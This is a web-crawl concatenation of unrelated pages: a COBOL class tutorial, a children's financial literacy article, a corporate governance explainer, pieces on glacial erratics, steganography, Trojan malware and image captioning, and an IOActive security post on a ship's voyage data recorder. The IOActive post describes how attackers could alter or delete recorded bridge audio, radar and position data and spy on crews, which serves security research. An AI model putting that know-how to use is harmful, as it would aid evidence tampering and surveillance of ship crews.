instance method is exactly like writing a class method, with the only difference being the scope of data which the instance method can access. The instance method can access data: To see the "start" method for Stopwatch This method does not declare any data of its own, but makes changes to the object's state by altering data declared in the Object-Storage Section. The code below summarizes the structure of an Object COBOL class, and recaps the material covered so far in this tutorial. class-id. Stopwatch inherits from Base. *> Identification and inheritance class-control. *> Class control paragraph *> names the files Stopwatch is class "stopwtch" *> containing the Base is class "base" *> executables for each *> class. . *> Period terminates paragraph. data division. *> Data division header is *> optional. ... working-storage section. ... procedure division. *> procedure division is *> optional. You can *> use it for class *> initialization. exit program. *> Terminates procedure division *> division. class-object *> Defines the start of the class *> object. object-storage section. *> Defines class object data ... ... method-id. "new". *> Start of class method "new". ... end method "new". *> End of class method "new". end class-object. *> End of the class object object. *> Start of the code *> defining behavior *> of instances *> of the class. object-storage section. *> Defines instance data. ... method-id. "start". *> Start of instance *> method "sayHello" ... end method "stop". *> End of instance method. end object. *> End of code for *> instances. end class Stopwatch. This completes the summary of class structure. In the next section you will animate some of the Stopwatch code. In this session, you will animate some of the code in the Stopwatch class, to see how classes and objects work. You are going to use the same programs as in the Objects and Messages Tutorial, but this time Stopwatch is compiled for animation so that you can see the code execute. To animate the Stopwatch class: This compiles timer.cbl and stopwtch.cbl for animation. Animator starts with the statement below tag T001 highlighted ready for execution. invoke StopWatch "new" ... This sends the "new" message to the Stopwatch class, and execution switches to the "new" method of the Stopwatch class. invoke super "new"... The mechanism for actually creating a new object (allocating the memory and returning an object handle) is inherited from the supplied class library, and this statement executes the inherited method. Some classes do not implement the "new" method at all, but rely on the inherited method. Those that re-implement it usually do so to send an initialization message to the new object. In this case we have overridden it to keep track of the number of instances created. add 1 to osCount Data item osCount is part of the class data, which is declared in the class Object-Storage Section. statement to return from the method back to timer.cbl.invoke wsStopWatch1 "start" Control switches to the "start" method of Stopwatch. Scroll up through the code to the Object header (between tags S030 and S035). Methods which appear after the Object header are instance methods, and can access data declared in the Object-Storage Section below the Object header. They can't access data declared in the class object (between the Class Object and End Class-Object headers). The "start" method tests to see whether the stopwatch is currently running, and if it isn't, stores the current time in Object-Storage, in the startTime variable. ), up to and including the exit method Control returns to timer.cbl. invoke StopWatch "new" ): push the Perform Step keys. This creates a second stopwatch; using perform step saves you from having to step through all the "new" code a second time. invoke Stopwatch "howMany" Execution switches to the "howMany" method of Stopwatch. This is a class method (between the Class-object and End Class-Object headers), and returns the value in class data variable osCount. move osCount to lnkCount to and including exit method .invoke wsStopwatch2 "start" Execution switches to the "start" method of Stopwatch. When you executed this method previously, on step 8, you set watchRunning to true, but now it reads false. The reason is that each different instance of Stopwatch has its own unique data. The last time you executed this method, you sent the "start" message to the instance of Stopwatch represented by the handle in wsStopwatch1; this time you have sent it to a different instance, which has its own data. Control returns to timer.cbl. At this point you have seen class object and instance object code executing, and how different instances have different data. You can animate the rest of the code if you are interested to see how the Stopwatch works. This concludes this tutorial on writing a class program. In this tutorial you learned: The next tutorial explains inheritance in more detail. Copyright © 1999 MERANT International Limited. All rights reserved. This document and the proprietary marks and names used herein are protected by international law. Objects and Messages Tutorial | Inheritance Tutorial |
<urn:uuid:4ad12803-f0a7-46c7-933b-33d778165c7f>
CC-MAIN-2024-38
https://www.microfocus.com/documentation/server-express/sx20books/opclau.htm
2024-09-11T04:29:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00624.warc.gz
en
0.881394
2,415
3.75
4
Financial literacy is an essential skill that sets the foundation for a secure future. Given the complexities of today’s economic landscape, introducing children to financial concepts from an early age can prove transformative. From teaching simple budgeting principles to instilling the value of saving and investing, early financial education equips children with the tools they need for financial independence. This article explores the methodologies, benefits, and practical strategies for teaching financial literacy to children, ensuring they are well-prepared for their financial futures. The Importance of Early Financial Education Starting financial education early, even as young as age three, can profoundly impact an individual’s financial outcomes. Studies have shown that children who are taught about money management from an early age have better financial habits and outcomes in adulthood. Engaging young minds with game-based learning activities can make the concept of money more tangible and less abstract. Games that simulate buying, selling, and saving can make learning about finances both educational and fun. By modeling positive financial behaviors, parents can provide real-life lessons that stick. Actions speak louder than words, and children who see their parents manage money wisely are more likely to emulate these behaviors. The way parents handle their finances—whether through budgeting, saving, or investing—serves as a living example for their children. Furthermore, providing children with allowances presents an excellent opportunity to introduce concepts like savings, budgeting, and responsible spending. Allowing children to manage small sums of money can prepare them for larger financial responsibilities in the future. Engaging children in practical money-handling activities, such as setting up small accounts or managing prepaid cards, helps them gain firsthand experience with financial concepts. This experiential learning is crucial for developing a strong understanding of money management principles. By combining these practices with open discussions about money and its role in daily life, parents can create a holistic financial education environment at home. Parental Involvement in Financial Education Parents are often the first point of contact when it comes to children learning about money. By involving children in financial discussions and decisions, parents can lay a strong foundation for understanding financial concepts from a young age. Discussing family budgeting, for example, can teach children about the difference between needs and wants, and the importance of planning and prioritizing expenditures. Providing real-money lessons can be incredibly beneficial. Allowances can be structured to incentivize savings and teach budgeting. For instance, encouraging children to set aside a portion of their allowance for savings and another portion for personal spending can foster a disciplined approach to money management. Additionally, engaging children in discussions about financial goals—such as saving for a desired toy or gadget—can illustrate the benefits of delayed gratification. Taking an active role in a child’s financial education involves more than just providing allowances. Parents can set up small savings goals and track progress together, fostering a sense of achievement and responsibility. This collaborative approach helps children see the value of setting financial goals and working towards them. Over time, these small lessons can build a solid foundation for managing larger financial tasks, such as paying bills or making investment decisions, as they grow older. Structured Financial Literacy Programs in Schools The formal inclusion of financial literacy in school curricula is gaining traction, with an increasing number of states mandating personal finance courses in schools. These programs are designed to teach students critical financial concepts such as budgeting, saving, investing, and understanding credit. Early exposure to these subjects can demystify finances and reduce financial anxiety among students. Schools offer an excellent environment for structured learning, where students can engage in both theoretical lessons and practical applications. Financial education apps and digital platforms, when integrated into the classroom, further enhance engagement and accessibility. These tools help students practice financial concepts in real-time, offering simulations that mirror real-life financial decisions and consequences. Practical exercises, such as managing a small budget for a class project or participating in simulated stock market games, allow students to apply what they’ve learned in a controlled and supportive environment. These activities help build confidence and prepare students for real-world financial responsibilities. By incorporating financial literacy into school curricula, educators can ensure that all children, regardless of their home environment, receive a solid financial education. This exposure to financial management at school complements the lessons learned at home, creating a comprehensive learning experience that prepares students for future financial challenges. Key Financial Concepts: Budgeting and Saving One of the foundational pillars of financial literacy is budgeting. Teaching children how to budget involves outlining the principles of dividing money into different categories such as needs, wants, and savings. The commonly cited 50/30/20 rule—allocating 50% of income to needs, 30% to wants, and 20% to savings—can serve as a practical guideline. To make budgeting more relatable, parents and educators can leverage tools like visual charts or digital apps. For younger children, a simple three-jar system—one jar for saving, one for spending, and one for giving—can be a hands-on way to teach budgeting. As children grow older, transitioning to more sophisticated budgeting tools, such as spreadsheets or dedicated apps, can help them manage their finances effectively. Saving is another critical concept that should be introduced early. Children should be encouraged to set savings goals—both short-term for small purchases and long-term for more significant financial milestones. Understanding the value of saving for future needs and emergencies can instill a sense of financial security and responsibility. By involving children in setting their savings goals and tracking their progress, they can see the tangible benefits of delayed gratification and disciplined saving habits. Furthermore, explaining the significance of emergency funds can prepare children for unexpected financial challenges. By teaching them to set aside money for unforeseen circumstances, parents and educators can help children build a safety net that offers peace of mind. This early introduction to the importance of saving not only helps children develop healthy financial habits but also cultivates a mindset of preparedness that will serve them well throughout their lives. Introducing Investing Concepts Financial literacy is a crucial skill that lays the groundwork for a stable and secure future. In today’s intricate economic environment, introducing children to financial concepts at a young age can be transformative. Teaching them fundamental budgeting principles, the importance of saving, and the basics of investing offers them the tools necessary for financial independence. Early financial education doesn’t just prepare kids for adulthood; it instills habits that can lead to long-term financial well-being. This article delves into various methodologies for imparting financial literacy to children, highlighting both the benefits and practical strategies. By breaking down complex financial ideas into age-appropriate lessons, parents and educators can make the learning process engaging and effective. Introducing concepts like allowance management, goal setting, and the difference between needs and wants can make a significant impact. For instance, using games and interactive activities can help children grasp money management in a fun and memorable way. Real-world applications, such as involving them in grocery shopping or setting up a small savings jar, can solidify these lessons. Ultimately, equipping children with financial literacy from an early age ensures they are well-prepared to navigate the financial aspects of adulthood. By instilling sound financial habits and knowledge, we can help them achieve financial independence and security in their future lives.
<urn:uuid:e39b5476-faae-493e-9f63-b90d6727a513>
CC-MAIN-2024-38
https://bankingcurated.com/capital-risk-and-assets/how-can-early-financial-education-secure-your-childs-future/
2024-09-13T14:30:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00424.warc.gz
en
0.938318
1,501
3.890625
4
There are multiple facilities, devices, and systems located on ports and vessels and in the maritime domain in general, which are crucial to maintaining safe and secure operations across multiple sectors and nations. This blog post describes IOActive’s research related to one type of equipment usually present in vessels, Voyage Data Recorders (VDRs). In order to understand a little bit more about these devices, I’ll detail some of the internals and vulnerabilities found in one of these devices, the Furuno VR-3000. (http://www.imo.org/en/OurWork/Safety/Navigation/Pages/VDR.aspx ) A VDR is equivalent to an aircraft’s ‘BlackBox’. These devices record crucial data, such as radar images, position, speed, audio in the bridge, etc. This data can be used to understand the root cause of an accident. Several years ago, piracy acts were on the rise. Multiple cases were reported almost every day. As a result, nation-states along with fishing and shipping companies decided to protect their fleet, either by sending in the military or hiring private physical security companies. Curiously, Furuno was the manufacturer of the VDR that was corrupted in this incident. This Kerala High Court’s document covers this fact: http://indiankanoon.org/doc/187144571/ However, we cannot say whether the model Enrica Lexie was equipped with was the VR-3000. Just as a side note, the vessel was built in 2008 and the Furuno VR-3000 was apparently released in 2007. During that process, an interesting detail was reported in several Indian newspapers. From a security perspective, it seems clear VDRs pose a really interesting target. If you either want to spy on a vessel’s activities or destroy sensitive data that may put your crew in a difficult position, VDRs are the key. Understanding a VDR’s internals can provide authorities, or third-parties, with valuable information when performing forensics investigations. However, the ability to precisely alter data can also enable anti-forensics attacks, as described in the real incident previously mentioned. Basically, inside the Data Collecting Unit (DCU) is a Linux machine with multiple communication interfaces, such as USB, IEEE1394, and LAN. Also inside the DCU, is a backup HDD that partially replicates the data stored on the Data Recording Unit (DRU). The DRU is protected against aggressions in order to survive in the case of an accident. It also contains a Flash disk to store data for a 12 hour period. This unit stores all essential navigation and status data such bridge conversations, VHF communications, and radar images. The International Maritime Organization (IMO) recommends that all VDR and S-VDR systems installed on or after 1 July 2006 be supplied with an accessible means for extracting the stored data from the VDR or S-VDR to a laptop computer. Manufacturers are required to provide software for extracting data, instructions for extracting data, and cables for connecting between a recording device and computer. Take this function, extracted from from the Playback software, as an example of how not to perform authentication. For those who are wondering what ‘Encryptor’ is, just a word: Scytale. VR-3000’s firmware can be updated with the help of Windows software known as ‘VDR Maintenance Viewer’ (client-side), which is proprietary Furuno software. The VR-3000 firmware (server-side) contains a binary that implements part of the firmware update logic: ‘moduleserv’ This service listens on 10110/TCP. Internally, both server (DCU) and client-side (VDR Maintenance Viewer, LivePlayer, etc.) use a proprietary session-oriented, binary protocol. Basically, each packet may contain a chain of ‘data units’, which, according to their type, will contain different kinds of data. At this point, attackers could modify arbitrary data stored on the DCU in order to, for example, delete certain conversations from the bridge, delete radar images, or alter speed or position readings. Malicious actors could also use the VDR to spy on a vessel’s crew as VDRs are directly connected to microphones located, at a minimum, in the bridge. Before IMO’s resolution MSC.233(90) , VDRs did not have to comply with security standards to prevent data tampering. Taking into account that we have demonstrated these devices can be successfully attacked, any data collected from them should be carefully evaluated and verified to detect signs of potential tampering.
<urn:uuid:db49dd62-d911-4368-9c77-ff1b4fcd89b1>
CC-MAIN-2024-38
https://ioactive.com/maritime-security-hacking-into-a-voyage-data-recorder-vdr/
2024-09-13T16:01:22Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00424.warc.gz
en
0.940421
981
2.734375
3
Corporate governance rules: What they are & why they matter Corporate governance is the (not so) secret to efficient, secure, high-performing organizations. However, organizations need corporate governance rules to truly walk the governance walk — not just talk the talk. Rules tell employees at all levels how to put critical governance principles into practice. Yet, rules aren’t just an internal tool. Just as organizations have rules stakeholders must follow, regulatory agencies have strict rules related to governance. Following them is the key to maintaining good standing, avoiding costly regulatory action, and listing shares in essential markets. Here, we’ll cover key aspects of corporate governance rules and how to apply them, including: - What corporate governance rules are - The five golden rules of corporate governance - Principles common across modern companies - Corporate governance listing rules for Nasdaq, the NYSE and the SEC What are corporate governance rules? Corporate governance rules are policies and practices that guide stakeholders in enacting the organization’s governance framework. These rules can be issued by the organization itself or by a regulator. In either case, though, rules enhance accountability and organization performance while aiding compliance with key governance practices. The 5 golden rules of corporate governance Governance frameworks vary between organizations, but several basic principles underpin them all. These principles are called the “golden rules” because they’re fundamental to effective governance practices and ensure that organizations serve all of their stakeholders well. These rules are: - Responsibility: Organizations are responsible for monitoring and managing risks, including comprehensive internal controls, a clear risk management strategy, and policies for addressing issues like compliance or conflicts of interest. - Accountability: Establish clear roles and communicate them effectively so all stakeholders understand exactly what they’re responsible for and who they’re accountable to. Boards, for example, are accountable to shareholders, while management is accountable to the board. - Awareness: To follow corporate governance rules, stakeholders need to know them. Awareness ensures that all stakeholders understand their role in upholding the organization’s ethical standards and regulatory requirements. - Fairness: Organizations must serve all stakeholders fairly and should have rules to advance that charge. This involves promoting workplace and boardroom equity and fostering an inclusive environment. - Transparency: Companies should act transparently internally and externally. Stakeholders should have any information material to their work or investment decisions, while regulators and shareholders should receive timely, accurate financial and non-financial disclosures. Other principles of corporate governance Together, the five golden rules form a solid corporate governance foundation, but they are only a few ways organizations should conduct themselves. Governance standards can be wider reaching and often include: - Ethics: Companies have a legal and moral obligation to act ethically. Corporate governance rules should include clear codes of conduct, guiding employees at all levels to adhere to practices that promote honesty, fairness and transparency. - Risk management: Risk is inherent in any organization, but good governance should mitigate it. This involves developing a risk management framework and internal controls related to risk and financial reporting. - Stakeholder engagement: Governance helps corporations serve their shareholders by implementing rules for communicating with and engaging stakeholders, which include shareholders, employees, customers and the community. Common rules governing modern companies National laws and regulations often influence corporate governance rules, leading to similar rules across corporations — regardless of the industry. By following them, organizations build trust with their investors, employees and community and affirm their commitment to responsible, ethical operations. Most, if not all, corporations will have rules around: - Board composition: Most organizations have corporate governance rules that dictate the number of directors on the board and how many should be executive, non-executive or independent. This ensures a diverse and balanced set of perspectives in the boardroom. - Executive compensation: Corporate governance also defines the structure of executive compensation, including salary and non-salary benefits. Compensation should reflect the executive’s experience and the corporation's performance and goals. Organizations should also have rules requiring the disclosure of those salaries and the criteria behind them. - Shareholder rights: A key tenet of corporate governance is that shareholders have rights, including voting on key issues. Corporate governance rules entitle shareholders to weigh in on board appointments or changes in strategic direction, among other priorities. Organizations must also protect minority shareholders against controlling shareholders. - Financial reporting: Organizations disclose their financials accurately and timely. This supports shareholders’ rights by giving them the information they need to make key decisions, but it’s also a regulatory requirement. Companies that don’t comply face strict regulatory action, including fines. Nasdaq corporate governance listing rules Corporate governance rules aren’t just for employees. Nasdaq is one of several markets that has specific corporate governance rules. Organizations that meet them can be listed on the Nasdaq Stock Market, while organizations that don’t either won’t be listed or will risk being de-listed. The Nasdaq rules seek to promote transparency and accountability in business dealings and oversee several areas, including: - Board of Directors: Nasdaq regulates several characteristics of the board. Most board directors must be independent to be listed on the Nasdaq Stock Market. The directors must also meet regularly without management present to ensure impartial board activity. - Board committees: Organizations listed on Nasdaq must also have several board committees, each of which should be composed of independent directors and at least one director considered an expert in the subject. These include the audit, compensation and governance committees. - Code of conduct: To enhance company integrity, Nasdaq also requires organizations to have a code of conduct that applies to all employees, executives and board directors. The code should be public and include rules specific to conflicts of interest and compliance. - Shareholder meetings: Nasdaq requires shareholders to meet annually to ensure shareholders have a voice in the boardroom. Companies must also establish a quorum at those meetings, meaning enough shareholders are present to represent one-third of the shares. - Corporate governance framework: Organizations must have corporate governance rules before listing on Nasdaq. That includes adopting and disclosing practices for various operations, including board roles, responsibilities, compensation and more; many organizations use a governance platform to meet this rigorous standard. NYSE corporate governance listing rules Like Nasdaq, the New York Stock Exchange (NYSE) has strict rules they monitor and enforce for all listed companies. NYSE does have many of the same rules as Nasdaq, but there are some distinct requirements, including: - Shareholder approval of executive compensation: The NYSE requires that shareholders vote on and approve all executive compensation packages, including any changes to the compensation of existing executives. - Certification: Before organizations can list on the NYSE, the CEO must personally certify that they do not know of noncompliance with NYSE listing rules. CEOs are also obligated to notify the NYSE immediately if any executive learns of instances of noncompliance. - Website disclosure: NYSE-listed companies must have a publicly available website and publish corporate governance documents there, including committee charters, corporate governance principles, and more. SEC corporate governance listing rules The Securities and Exchange Commission (SEC) is a regulatory body that governs all publicly traded companies in the United States. As such, the SEC doesn’t have listing rules of its own. Instead, it has various regulations that impact corporate governance, all of which aim to protect investors and maintain fair markets. A few of the better-known regulations in recent years are: - Sarbanes-Oxley (SOX) Act of 2002: The SOX Act relates specifically to financial reporting and disclosures, requiring that covered organizations implement robust internal controls over financial reporting and certify the accuracy of financial statements. - Dodd-Frank Wall Street Reform and Consumer Protection Act: This regulation, known as the Dodd-Frank Act, offers guidelines for executive compensation. The act mandates that organizations conduct a non-binding shareholder vote and that companies have policies for recovering executive compensation in the event of misconduct, among other stipulations. - Universal proxy: The SEC gives shareholders the right to make their own proposals at annual meetings. Under universal proxy, shareholder proposals will appear on the same universal proxy card as the organization’s proposals, giving more credence to investors’ voices. - Climate risk disclosure: One of its newest regulations, the SEC’s climate risk disclosure rule, requires companies to disclose climate-related risks and whether those risks are integrated into the organization’s enterprise risk management strategy. Master good governance principles and practices Corporate governance rules are your organization’s rails; they keep the train on track toward ethical, accountable and honest business practices. However, they don’t propel the train forward. The engine does. Likewise, the combination of effective rules and robust practices truly puts governance in motion. While your rules say to act ethically, for example, the principles explain exactly how employees should act ethically, whether they’re involved in executive compensation decisions, financial reporting, board succession planning or anything else governance touches. Learn more about what constitutes good governance and how to adopt effective principles for your organization.
<urn:uuid:f934aa84-6f28-4909-8952-30086500f5b0>
CC-MAIN-2024-38
https://www.diligent.com/resources/blog/corporate-governance-rules
2024-09-14T20:18:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00324.warc.gz
en
0.951645
1,882
2.578125
3
What are glacial erratics and how are they formed? Glacial erratics are boulders found in glacial till or on the surface, transported by glaciers. How do glaciers move these large rocks? Glacial erratics are large rocks that have been carried by glaciers and deposited in areas different from their original source. Glaciers pick up these boulders as they move across the landscape, often during periods of glacial advance. Once the glaciers melt, they leave behind these erratic rocks in places where they wouldn't naturally occur. Glacial erratics are a fascinating geological phenomenon that provides valuable insight into Earth's history and past glacial activity. These boulders, which can range in size from small pebbles to massive rocks, are typically made of rock types that are different from the bedrock of the surrounding area. When glaciers advance, they can pick up rocks of various sizes and transport them over long distances. As the glacier moves, the rocks are incorporated into the ice and can be carried for hundreds of miles. When the glacier retreats or melts, these boulders are left behind, often sitting on top of the ground or embedded in glacial till. Glacial erratics can provide valuable information about the extent of past glaciations, the direction of ice flow, and the composition of the rocks in the region where they are found. Scientists study these erratics to reconstruct the movements of ancient glaciers and understand how they shaped the landscape. Overall, glacial erratics are an interesting feature of glacial geology that helps us unravel the mysteries of Earth's past and the powerful forces that have shaped our planet over millions of years.
<urn:uuid:3e15671e-9f76-4812-b226-92477bc8b0f5>
CC-MAIN-2024-38
https://bsimm2.com/geography/glacial-erratics-a-geological-phenomenon.html
2024-09-17T07:39:30Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00124.warc.gz
en
0.953675
341
4.40625
4
Researchers claim to have created a “perfectly secure” way to pass hidden information in plain sight and say their work could revolutionise social media and private messaging The team, led by the University of Oxford in collaboration with Carnegie Mellon University, says it has achieved a breakthrough in secure communications by developing an algorithm that conceals sensitive information so effectively that it is impossible to detect anything hidden. The algorithm uses new advances in information theory to conceal one piece of content inside another in a way that cannot be detected, which may have substantial implications for information security besides further applications in data compression and storage. The team says this method may soon be used in digital human communications, including social media and private messaging. In particular, the ability to send perfectly secure information may empower vulnerable groups, including humanitarian workers. “Our method can be applied to any software that automatically generates content,” says co-lead author Dr Christian Schroeder de Witt of Oxford University’s Department of Engineering Science. “For instance, probabilistic video filters or meme generators. This could be very valuable, for instance, for journalists and aid workers in countries where the act of encryption is illegal. However, users still need to exercise precaution as any encryption technique may be vulnerable to side-channel attacks such as detecting a steganography app on the user’s phone.” The algorithm applies to a setting called steganography: the practice of hiding sensitive information inside of innocuous content. Steganography differs from cryptography because the sensitive information is concealed in such a way that obscures the fact that something has been hidden. The researchers say an example could be hiding a Shakespeare poem inside an AI-generated cat image. New algorithm uses information theory Despite having been studied for more than 25 years, existing steganography approaches generally have imperfect security, meaning that individuals who use these methods risk being detected. This is because previous steganography algorithms would subtly change the distribution of innocuous content. To overcome this, the research team used recent breakthroughs in information theory, specifically minimum entropy coupling, which allows one to join two distributions of data together such that their mutual information is maximised, but the individual distributions are preserved. As a result, with the new algorithm, there is no statistical difference between the distribution of innocuous content and the distribution of content that encodes sensitive information. The algorithm was tested using several models that produce auto-generated content, such as GPT-2, an open-source language model, and WAVE-RNN, a text-to-speech converter. Besides being perfectly secure, the new algorithm showed up to 40% higher encoding efficiency than previous steganography methods across various applications, enabling more information to be concealed within a given amount of data. This may make steganography an attractive method, even if perfect security is not required, due to the benefits of data compression and storage. The research team has filed a patent for the algorithm but intends to issue it under a free licence to third parties for non-commercial responsible use. They will also present the new algorithm at the 2023 International Conference on Learning Representations in May. ‘The main contribution of the work is showing a deep connection between a problem called minimum entropy coupling and perfectly secure steganography,” says co-lead author Samuel Sokota, of Carnegie Mellon University’s Machine Learning Department. “By leveraging this connection, we introduce a new family of steganography algorithms that have perfect security guarantees.”
<urn:uuid:99bc633e-7c54-427e-add7-aeae686149be>
CC-MAIN-2024-38
https://cybermagazine.com/articles/perfectly-secure-algorithm-could-aid-spread-of-free-speech
2024-09-19T18:37:27Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652055.62/warc/CC-MAIN-20240919162032-20240919192032-00824.warc.gz
en
0.926107
718
3.640625
4
A Trojan horse—also called a Trojan virus or simply a Trojan—is a type of malware that disguises itself as legitimate software. They appear innocent or beneficial from the outside, but these files execute harmful actions, from installing spyware to encrypting critical files once users interact with them. Trojan horses accounted for at least six of the 11 most common malware strains in 2021, according to the Cybersecurity and Infrastructure Security Agency (CISA). In light of this threat, businesses should learn all they can about Trojans to stay safe. Table of Contents What does a Trojan horse virus do? Trojan horses deceive people into thinking they’re harmless. Once a user installs or runs the application, it executes the hidden malware. Despite the moniker “Trojan virus,” these programs aren’t technically viruses. Whereas a virus can execute and replicate itself, a Trojan requires action from the users to run and spread. That’s why they disguise themselves as legitimate programs people want to download and install. Once inside a system, Trojans can perform a wide range of attacks. Because of their deceiving nature, many cybercriminals use them to quietly spread spyware or ransomware behind the scenes. However, some Trojan strains immediately carry out more noticeable attacks when users run them. 5 types of Trojan horses Trojans are a remarkably popular type of malware and can appear in forms as varied as backdoor Trojans, DDoS Trojans, downloaders, ransom Trojans, and rootkit Trojans. 1. Backdoor Trojans A backdoor Trojan installs a backdoor on your computer once inside, granting cybercriminals remote access. Attackers often use them to create botnets, which carried out hundreds of thousands of attacks in 2022 alone. 2. DDoS Trojans Distributed denial of service (DDoS) Trojans often overlap with backdoor Trojans. These malware strains take control of an infected computer to overload a website or network with requests as part of a DDoS attack. 3. Downloader Trojans Downloader Trojans serve as the first step to larger attacks. Once users install these programs, the Trojan downloads other malicious software, much like how malvertising installs malware through seemingly innocuous ads. Some of these attacks just download adware, but cybercriminals also use them to spread more damaging software. 4. Ransom Trojans Ransom Trojans are some of the most disruptive types. These slowly spread across users’ devices, hindering performance or blocking critical data, demanding a ransom in return for undoing the damage. 5. Rootkit Trojans A rootkit Trojan conceals itself or other malware so it can run malicious programs undetected for longer. They buy cybercriminals more time, enabling much larger, potentially damaging attacks. Best practices to prevent Trojan horse viruses Trojans can cause considerable damage, so businesses should try to prevent them as much as possible. Prevention starts with better credential management, as 90% of all cyberattacks originate from compromised usernames or passwords. Use multifactor authentication (MFA) and vary passwords between accounts to stop an attacker from infiltrating your account and installing a Trojan. User education is also important, as Trojans try to trick people into thinking they’re harmless. Employees should know to never click on unsolicited links, download software from unverified sources, or open attachments from people they don’t know. Scanning email attachments before clicking on them can also help identify Trojans before accidentally installing them. Users should avoid visiting potentially unsafe websites; stricter network administrator policies and security software can help with this by establishing blocklists and allowlists of certain sites.. Ad blockers are another useful tool, as they can prevent Trojan attacks originating from malvertising. How to detect and recover from Trojan attacks Even with these preventive measures, businesses should never assume they won’t experience a successful attack. Almost half of all small businesses have fallen victim to cyberattacks in the past year. A plan to detect and recover from successful Trojan attacks will mitigate their impact. Because Trojans operate behind the scenes, they’re difficult to spot manually. Sudden performance changes or changing settings are telltale signs, but at that point, most of the damage is already done. The best way to detect Trojans is with anti-malware or antivirus software. Regular security scans can detect malicious code hidden within seemingly harmless files and alert you to the issue. You can then use this software to remove the infected programs safely. Be sure to keep anti-malware solutions updated to ensure they can detect changing attack vectors and new Trojan strains. Trojans on phones and mobile devices It’s important to recognize that Trojans can impact mobile devices, too. Laptop and desktop computers are still the most common targets, but malware strains are also starting to affect phones and tablets. Trojans are the most common type of mobile malware, with downloader Trojans alone accounting for 26.28% of all threats. Many of these are apps, often pretending to be legitimate. Cybercriminals can also install Trojans on a mobile device through malicious links in text messages or emails. Users should only download apps from first-party stores to avoid downloading mobile Trojan horses. Similarly, you should avoid clicking links on unsolicited texts, emails, or messages from unknown sources. Using an anti-malware solution with support for mobile operating systems will also help. Real-world examples of Trojan viruses Whether mobile or otherwise, these threats are more than just theoretical. Trojan attacks have affected thousands, if not millions, of users, including several high-profile organizations. One of the most infamous Trojan examples is Emotet, which first emerged in 2014 as a banking Trojan, targeting users’ accounts. It evolved to carry a wide range of different malware strains, leading to 16,000 alerts in 2020 as more cybercriminals embraced it. Zeus—also called Zbot—is another infamous Trojan. This malware strain gained notoriety in 2007 when it stole information from more than 1,000 computers belonging to the U.S. Department of Transportation. After infecting devices, the Trojan would log keystrokes to learn users’ passwords, banking info, and more. The Rakhni Trojan first appeared in 2013 and became popular again in 2018 as its use cases expanded. Rakhni lets cybercriminals either infect targets’ devices with ransomware or take control of them to mine cryptocurrency. 5 antivirus tools that prevent and detect Trojan horses Reliable anti-malware tools are your best defense against Trojans. These five solutions represent some of the leading options for preventing, detecting, and removing Trojan viruses today. 1. Bitdefender Total Security Bitdefender Total Security offers a comprehensive security platform, including a cloud-based malware scanner, phishing protection, and support for virtually all operating systems. This coverage helps prevent Trojan infections on any device. It’s available both as a stripped-down free version, and a subscription starting at $39.99 per year for coverage for five devices. 2. Avast One Avast One offers advanced malware scanning on all device types, including mobile endpoints. It also has anti-phishing and ransomware prevention features and has a free tier for users with smaller budgets, as well as individual and family plans starting at $4.19 per month for five devices. 3. Norton 360 Deluxe Norton is the most popular provider of paid antivirus, and its 360 Deluxe platform is ideal for stopping Trojans. It uses machine learning to detect suspicious activity, helping it spot Trojans faster and more accurately. They have a variety of subscription tiers, starting at $19.99 per year for a single device, or $49.99 per year for five devices. 4. McAfee Total Protection McAfee Total Protection also uses AI to detect malware like Trojans. It has useful restoration features to recover stolen data and manage accounts in the event of a successful Trojan attack. It offers a basic, single-device subscription for $49.99 per year, or more advanced security starting at $64.99 per year for five devices. Malwarebytes deserves mention as a free alternative to these paid anti-Trojan solutions. However, it requires you to manually start a scan instead of monitoring devices automatically. Since 85% of data breaches stem from human error, reliance on manual processes isn’t ideal, but it is better than nothing. Malwarebytes does also offer paid enterprise-level protection plans starting at $69.99 per device, per year—but you have to enroll at least 10 devices. Bottom line: Protecting your organization from Trojan horses Trojan horse viruses are some of the most pervasive and potentially difficult-to-spot threats facing companies today. However, the right approach can prevent and remove them effectively. You can stay safe when you know what these programs do, how they infect devices, and how you can address them.
<urn:uuid:136740f0-fb93-4e22-877b-0c00d0bc15ee>
CC-MAIN-2024-38
https://www.enterprisenetworkingplanet.com/security/what-is-a-trojan-virus/
2024-09-07T18:14:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00124.warc.gz
en
0.931445
1,879
3.28125
3
Automatically describing the content of an image is a fundamental problem in AI that connects computer vision and natural language processing. Google in a recent paper presented a generative model based on deep recurrent architecture that combines recent advances in computer vision and machine translation that can be used to generate natural sentences describing an image. Researchers at Stanford quoted in their abstract- “We present a model that generates free-form natural language descriptions of image regions. Our model leverages datasets of images and their sentence descriptions to learn about the inter-modal correspondences between text and visual data. Our approach is based on a novel combination of Convolutional Neural Networks over image regions, bidirectional Recurrent Neural Networks over sentences, and a structured objective that aligns the two modalities through a multimodal embedding.” Distinguished Scholar Geoff Hinton was asked in a recent Reddit Ask Me Anything session, about how deep learning models might account for various elements and objects present in a single image. The closing lines in his response: “I guess we should just train [a recurrent neural network] to output a caption so that it can tell us what it thinks is there. Then maybe the philosophers and cognitive scientists will stop telling us what our nets cannot do.”] “I consider the pixel data in images and video to be the dark matter of the Internet,” said Fei-Fei Li, director of the Stanford Artificial Intelligence Laboratory, who led the research with Andrej Karpathy, a graduate student. “We are now starting to illuminate it.” This collaboration between Stanford and Google can possibly lead to more advanced object recognition systems with human-like understanding and prediction capabilities. It is also very promising for developing application models that can assess the entirety of scenes and deliver accurate image results and content libraries. Machine translation that powers Skype Translate and Google’s word2vec libraries are among other advancements in language understanding perpetuated by recurrent neural networks. Read more here (Image Credit: Franco Folini)
<urn:uuid:fe17953b-68db-4f23-94bb-1e00637b102f>
CC-MAIN-2024-38
https://dataconomy.com/2014/11/19/google-and-stanford-collaborate-to-build-neural-image-caption-generator/
2024-09-16T06:55:40Z
